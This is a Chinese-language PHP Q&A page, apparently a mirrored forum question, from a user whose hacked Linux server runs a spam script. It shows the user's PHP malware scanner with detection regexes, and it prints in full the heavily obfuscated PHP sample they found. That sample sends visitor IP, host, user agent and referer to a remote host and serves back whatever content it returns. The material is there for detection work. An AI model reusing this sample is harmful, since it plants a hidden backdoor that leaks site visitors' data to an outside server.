最受欢迎

使用 php (正则表达式) 在 Linux 服务器上查找垃圾邮件发送者脚本

Finding spammer script on the linux server using php (regex)

本文关键字:查找 脚本 发送者 服务器 php 正则表达式 Linux 使用 | 更新日期: 2023-09-27

我的 Linux 服务器最近被黑客入侵,我的服务器上运行了一个发送垃圾邮件的脚本,我想找到它的生成器并以这种方式删除它。我创建了一个 php 代码来搜索所有目录中的确切模式并提醒我,它可以通过使用 pregmatch 功能找到模式。但我无法找出 pregmatch 命令的正确正则表达式来查找例如以下模式: 

${"'x47'x4c'x4fB'x41'x4c'x53"}["'x67i'x65q'x68'x6ai'x79e'x6a'x72g"]="'x75'x72'x69";

我的代码 : 

class ScanFiles {
    public $infected_files = array();
    private $scanned_files = array();

    function __construct() {
        $this->scan(dirname(__FILE__));
        $this->sendalert();
    }

    function scan($dir) {
        $this->scanned_files[] = $dir;
        $files = scandir($dir);
        if(!is_array($files)) {
            throw new Exception('Unable to scan directory ' . $dir . '.  Please make sure proper permissions have been set.');
        }
        foreach($files as $file) {
            if(is_file($dir.'/'.$file) && !in_array($dir.'/'.$file,$this->scanned_files)) {
                $this->check(file_get_contents($dir.'/'.$file),$dir.'/'.$file);
            } elseif(is_dir($dir.'/'.$file) && substr($file,0,1) != '.') {
                $this->scan($dir.'/'.$file);
            }
        }
    }

    function check($contents,$file) {
        $this->scanned_files[] = $file;
        if(preg_match('/eval'((base64|eval|'$_|'$'$|'$[A-Za-z_0-9'{]*('(|'{|'[))/i',$contents) || preg_match('/'${"'x47'x4c'x4fB'x41'x4c'x53"}["'x67i'x65q'x68'x6ai'x79e'x6a'x72g"]'b/i',$contents)) {
            $this->infected_files[] = $file;
        }
    }

    function sendalert() {
        if(count($this->infected_files) != 0) {
            $message = "== MALICIOUS CODE FOUND == 'n'n";
            $message .= "The following files appear to be infected: 'n";
            foreach($this->infected_files as $inf) {
                $message .= "  -  $inf 'n";
            }
        mail(SEND_EMAIL_ALERTS_TO,'Malicious Code Found!',$message,'FROM:');
            echo "Malicious Code Found! : ".$message;
        }else{
            echo "No Malicious Found.";
        }
    }

}

我手动找到的垃圾邮件脚本,但它使用新文件名在服务器上复制: 

<?php ${"'x47'x4c'x4fB'x41'x4c'x53"}["'x67i'x65q'x68'x6ai'x79e'x6a'x72g"]="'x75'x72'x69";
${"'x47'x4c'x4f'x42'x41'x4cS"}["p'x69'x77'x64'x79'x73vi'x6bh"]="'x64u'x6d'x6d'x79_'x70'x61g'x65";
${"'x47'x4cO'x42'x41'x4c'x53"}["'x72'x68'x74a'x78'x76c"]="'x69'x70'x5fke'x79'x73";
${"'x47'x4c'x4f'x42'x41'x4c'x53"}["'x68'x70'x76g'x74'x67'x62w'x71"]="fi'x6c'x65'x6eam'x65";
${"'x47LO'x42'x41'x4cS"}["'x6ag'x67'x70'x6c'x6d'x66'x6aq'x75'x70"]="'x63o'x6ete'x6e'x74";
${"'x47'x4c'x4f'x42'x41LS"}["'x79'x6cf'x71'x6f'x66x"]="'x69'x70";
${"'x47'x4c'x4fB'x41L'x53"}["'x61'x73'x69'x6f'x6e'x65'x65'x68'x62"]="'x63o'x6e'x74'x65'x6et";
${"'x47'x4c'x4fBA'x4c'x53"}["o'x67'x6anw'x64'x6a'x71'x63'x6a"]="u'x72'x6c";
${"'x47LOB'x41L'x53"}["'x66e'x71'x6bg'x6b'x72edp'x6er"]="'x69";
$tvjuit="ke'x79";
$khpkwwmtyl="'x6b'x65'x79";
${"G'x4c'x4fBA'x4c'x53"}["'x77'x76'x78t'x79hl"]="'x6b'x65y";
${"'x47LO'x42A'x4c'x53"}["l'x76'x67'x66o'x63'x74'x78"]="'x63on'x74e'x78'x74";
$nbutdw="url";
${"GLO'x42'x41L'x53"}["'x61tt'x64'x6f'x6db'x6e'x73'x70'x67"]="quer'x79";
${"'x47L'x4f'x42ALS"}["'x79'x64h'x62'x62'x65'x74'x79h"]="'x6b'x65y";
${"'x47'x4cOB'x41'x4c'x53"}["i'x6c'x62'x68'x75b'x73'x68'x64'x75f'x76"]="'x70'x61t'x68";
$pvpylyxbyi="c'x6fn'x74e'x6e'x74";
error_reporting(0);
$vyjgrxcpune="'x70'x6frt";
ini_set("di'x73'x70la'x79'x5fer'x72'x6f'x72s",0);
$cojuafthyws="'x6b'x65'x79";
${"GLO'x42'x41'x4c'x53"}["'x75w'x71'x76'x7a'x6a'x68'x65'x62'x73m"]="f'x69'x6ce'x6e'x61'x6d'x65";
$aqtvbwqxw="'x69p";
${"'x47'x4c'x4fBAL'x53"}["c'x61e'x70'x77'x71'x6f"]="'x63'x6f'x6e'x74'x65n'x74";
$qkrjqitq="ke'x79";
$whumtbg="'x71'x75'x65ry";
${$aqtvbwqxw}="89'x2e4'x38.11.'x33'x33";
${"'x47'x4c'x4f'x42'x41L'x53"}["z'x73'x75'x75'x65'x68'x65n"]="'x70a'x74'x68";
${"'x47LO'x42'x41'x4cS"}["'x76'x68t'x6c'x67'x67e'x71'x63'x62g"]="l'x65'x74'x74'x65'x72";
${$vyjgrxcpune}="80";
${"G'x4c'x4fBAL'x53"}["fs'x6c'x64'x7an"]="'x71uer'x79";
$ydnfejql="i";
${"G'x4c'x4f'x42'x41'x4c'x53"}["m'x64'x78'x79'x77'x6e'x77"]="'x71'x75'x65ry";
${${"'x47'x4c'x4fBALS"}["'x69'x6cb'x68'x75'x62'x73h'x64u'x66'x76"]}="/r'x6a'x62'x76'x63'x78'x77'x72'x65/'x34'x356vcx'x67r'x74'x2ephp";
${${"'x47'x4cO'x42'x41'x4c'x53"}["'x61'x74'x74'x64o'x6d'x62'x6e'x73'x70'x67"]}=Array();
${${"'x47'x4c'x4f'x42'x41'x4c'x53"}["'x61'x74td'x6f'x6d'x62nsp'x67"]}["i"]=get_ip();
${${"'x47'x4cO'x42'x41'x4cS"}["'x66'x73'x6c'x64'x7a'x6e"]}["'x70"]=@$_SERVER["'x48'x54T'x50'x5f'x48O'x53'x54"].@$_SERVER["'x52'x45Q'x55E'x53'x54'x5fUR'x49"];
${"G'x4c'x4f'x42'x41'x4c'x53"}["'x6d'x78'x66'x65'x6e'x7a'x6c'x6e"]="'x71ue'x72'x79";
$xuoyiyhluct="'x70'x6f'x72'x74";
$gcdkmyrmtf="c'x6fn'x74e'x6e'x74";
${${"'x47'x4cO'x42'x41'x4cS"}["m'x64'x78'x79'x77n'x77"]}["u"]=@$_SERVER["HTTP'x5f'x55SER_'x41G'x45N'x54"];
${${"'x47'x4cO'x42'x41L'x53"}["a'x74'x74'x64o'x6d'x62n'x73p'x67"]}["'x61"]=@$_SERVER["'x48'x54'x54P_AC'x43E'x50'x54_'x4cA'x4eGUAGE"];
${${"GL'x4f'x42'x41'x4cS"}["m'x78'x66'x65'x6ezl'x6e"]}["r"]=@$_SERVER["H'x54T'x50'x5fREFER'x45R"];
${${"'x47'x4cO'x42'x41'x4c'x53"}["'x6c'x76g'x66'x6f'x63'x74x"]}=stream_context_create(Array("'x68ttp"=>Array("m'x65'x74'x68'x6f'x64"=>"'x50OS'x54","he'x61'x64'x65'x72"=>"Con'x74en'x74-t'x79'x70e: app'x6c'x69'x63'x61'x74i'x6fn/'x78-'x77'x77w-'x66o'x72m-u'x72'x6c'x65'x6e'x63'x6f'x64'x65d","co'x6et'x65n'x74"=>http_build_query(${$whumtbg}))));
${${"'x47L'x4f'x42'x41'x4cS"}["'x77v'x78t'x79h'x6c"]}=30535;${$ydnfejql}=0;
foreach(str_split($_SERVER["RE'x51'x55E'x53'x54'x5fURI"])as${${"'x47'x4c'x4f'x42'x41'x4cS"}["'x76'x68t'x6cg'x67'x65'x71'x63'x62'x67"]}){${"'x47'x4c'x4fB'x41'x4c'x53"}["'x75o'x73'x74nl'x6f'x75"]="'x6cet'x74'x65'x72";
    ${${"'x47LOBA'x4cS"}["wv'x78'x74'x79'x68'x6c"]}+=ord(${${"'x47'x4cO'x42'x41'x4c'x53"}["u'x6fs'x74n'x6co'x75"]});
    ${${"GLO'x42A'x4cS"}["f'x65'x71kgkr'x65'x64'x70'x6er"]}++;}${${"'x47'x4c'x4fB'x41'x4c'x53"}["'x77v'x78'x74'x79h'x6c"]}<<=2;
${${"GL'x4fB'x41'x4c'x53"}["'x77'x76'x78'x74'x79'x68l"]}^=${$khpkwwmtyl};${$qkrjqitq}+=32;
${$cojuafthyws}=str_repeat(chr(${${"G'x4c'x4fBA'x4cS"}["y'x64'x68bb'x65'x74'x79h"]}),8);
${${"'x47'x4c'x4fBA'x4c'x53"}["'x6fg'x6a'x6ew'x64'x6a'x71'x63'x6a"]}="htt'x70://".long2ip(1489383561^(ord(${$tvjuit}[0])+ord(${${"G'x4c'x4f'x42'x41'x4cS"}["w'x76xtyh'x6c"]}[1])+(strstr(substr($_SERVER["R'x45'x51U'x45S'x54_'x55'x52'x49"],-4),".p'x68p")==FALSE?6:ip2long(${${"'x47'x4c'x4f'x42AL'x53"}["y'x6c'x66'x71'x6ff'x78"]})))).":".${$xuoyiyhluct}.${${"'x47LOB'x41'x4cS"}["'x7a'x73'x75ueh'x65n"]};
${${"'x47'x4cOBAL'x53"}["'x61s'x69o'x6ee'x65'x68'x62"]}=@file_get_contents(${$nbutdw},FALSE,${${"'x47L'x4fB'x41'x4cS"}["'x6cv'x67f'x6f'x63'x74'x78"]});
${"G'x4c'x4f'x42ALS"}["r'x64'x6bx'x67'x6b'x6a'x77"]="'x63'x6f'x6e'x74en'x74";if(strlen(${${"G'x4cO'x42'x41L'x53"}["jg'x67'x70l'x6d'x66j'x71'x75p"]})<10){error_404();
}${${"'x47L'x4f'x42A'x4cS"}["rd'x6bxg'x6b'x6a'x77"]}=explode("'n",${$pvpylyxbyi});
${${"'x47L'x4f'x42A'x4c'x53"}["'x68'x70'x76gt'x67'x62w'x71"]}=array_shift(${${"'x47'x4c'x4fB'x41'x4c'x53"}["j'x67gpl'x6d'x66'x6a'x71'x75'x70"]});
${${"G'x4cOBALS"}["'x6a'x67'x67'x70'x6cm'x66'x6a'x71'x75p"]}=implode("'n",${${"'x47'x4c'x4f'x42A'x4c'x53"}["c'x61ep'x77'x71o"]});
if(strstr(${${"'x47L'x4f'x42'x41'x4cS"}["u'x77q'x76z'x6a'x68'x65'x62'x73'x6d"]},"'x2eh'x74m'x6c")===FALSE){header("Co'x6et'x65'x6et-'x54'x79pe:'x20'x61p'x70'x6c'x69ca'x74i'x6fn/'x6f'x63'x74'x65'x74-st'x72'x65'x61'x6d");
    header("'x43o'x6et'x65nt-'x44i'x73'x70'x6f'x73'x69tio'x6e: a'x74'x74'x61'x63h'x6dent'x3b fi'x6ce'x6ea'x6d'x65=".${${"'x47'x4c'x4f'x42A'x4c'x53"}["h'x70vg'x74'x67'x62wq"]});
    header("'x43'x6fntent-'x4ce'x6eg'x74h: ".strlen(${${"'x47'x4c'x4f'x42'x41'x4cS"}["'x6a'x67'x67'x70'x6cm'x66'x6a'x71'x75p"]}));
}echo${$gcdkmyrmtf};
exit();
function get_ip(){${${"'x47'x4cO'x42'x41L'x53"}["r'x68t'x61'x78'x76'x63"]}=array("'x48T'x54P'x5f'x43'x46_'x43O'x4eN'x45'x43'x54'x49'x4eG'x5f'x49P","'x48T'x54P'x5fCLIENT_'x49P","'x48'x54TP_'x58'x5f'x46'x4f'x52'x57'x41'x52D'x45D_F'x4fR","'x48TTP_'x58'x5f'x46O'x52'x57A'x52D'x45'x44","'x48TTP_'x58_'x43'x4cU'x53T'x45R_'x43L'x49'x45N'x54'x5f'x49P","'x48TTP_F'x4fRWAR'x44E'x44'x5f'x46'x4fR","'x48TTP'x5fFORWA'x52'x44ED","RE'x4dO'x54E_'x41'x44D'x52");
    foreach(${${"G'x4cOB'x41'x4c'x53"}["'x72'x68'x74'x61'x78'x76'x63"]} as${${"G'x4c'x4f'x42'x41L'x53"}["'x77'x76'x78t'x79h'x6c"]}){$xfdiqu="'x6b'x65'x79";
        if(array_key_exists(${$xfdiqu},$_SERVER)===TRUE){${"'x47L'x4fB'x41'x4c'x53"}["p'x66bf'x65'x73'x6ch"]="i'x70";
            foreach(explode(",",$_SERVER[${${"'x47L'x4f'x42A'x4c'x53"}["wv'x78'x74'x79'x68'x6c"]}])as${${"G'x4c'x4f'x42A'x4c'x53"}["'x70'x66'x62fes'x6c'x68"]}){$kvytrcc="ip";
                return trim(${$kvytrcc});
            }}}return"'x3255.255'x2e25'x35'x2e2'x35'x35";
}function error_404(){${"GL'x4fB'x41'x4cS"}["'x62x'x74fbg'x6f"]="'x75'x72i";
    $rxdfcqp="'x64u'x6dmy'x5fp'x61'x67e";
    header("'x48'x54'x54'x50/1.'x31'x204'x304'x20No'x74'x20Found");
    ${${"G'x4cO'x42A'x4cS"}["'x62'x78'x74'x66'x62go"]}=preg_replace("/(''?)'x2e*'$/","",$_SERVER["RE'x51UE'x53T_'x55'x52'x49"]);
    ${$rxdfcqp}="/".uniqid().uniqid();
    ${${"'x47LOB'x41L'x53"}["'x6a'x67'x67'x70'x6c'x6d'x66'x6a'x71'x75'x70"]}=@file_get_contents("'x68tt'x70://".$_SERVER["'x48'x54'x54'x50'x5f'x48'x4fS'x54"].${${"'x47LO'x42'x41'x4c'x53"}["'x70'x69'x77d'x79s'x76'x69'x6b'x68"]});
    ${"'x47L'x4f'x42A'x4c'x53"}["'x79'x6e'x69'x61'x6d'x6e'x76'x71'x6d'x68c'x6b"]="'x63'x6fn'x74e'x6et";
    ${"'x47'x4c'x4fB'x41'x4c'x53"}["'x72'x63'x6ew'x72tu'x69'x6e'x6a'x62"]="'x63'x6f'x6e'x74'x65'x6e'x74";
    ${"'x47L'x4f'x42'x41'x4c'x53"}["'x65cqb'x76'x6a'x6c'x72"]="d'x75m'x6d'x79'x5fpa'x67'x65";
    ${${"'x47'x4c'x4fB'x41'x4c'x53"}["rc'x6e'x77'x72'x74'x75'x69'x6e'x6a'x62"]}=str_replace(${${"'x47L'x4fB'x41L'x53"}["'x65'x63'x71'x62vj'x6cr"]},${${"'x47LO'x42A'x4c'x53"}["'x67'x69'x65'x71hj'x69'x79e'x6ar'x67"]},${${"GLOBA'x4cS"}["jg'x67p'x6c'x6d'x66'x6a'x71u'x70"]});
    exit(${${"G'x4cOB'x41'x4c'x53"}["'x79'x6ei'x61'x6d'x6evq'x6dhc'x6b"]});}
?>

我使用另一种方法使用 grep 命令搜索此模式,并且我设法找到了垃圾邮件生成器。

相关文章:
最新更新
www.56WenDa.com 2012-2023 | php问答网 | php学习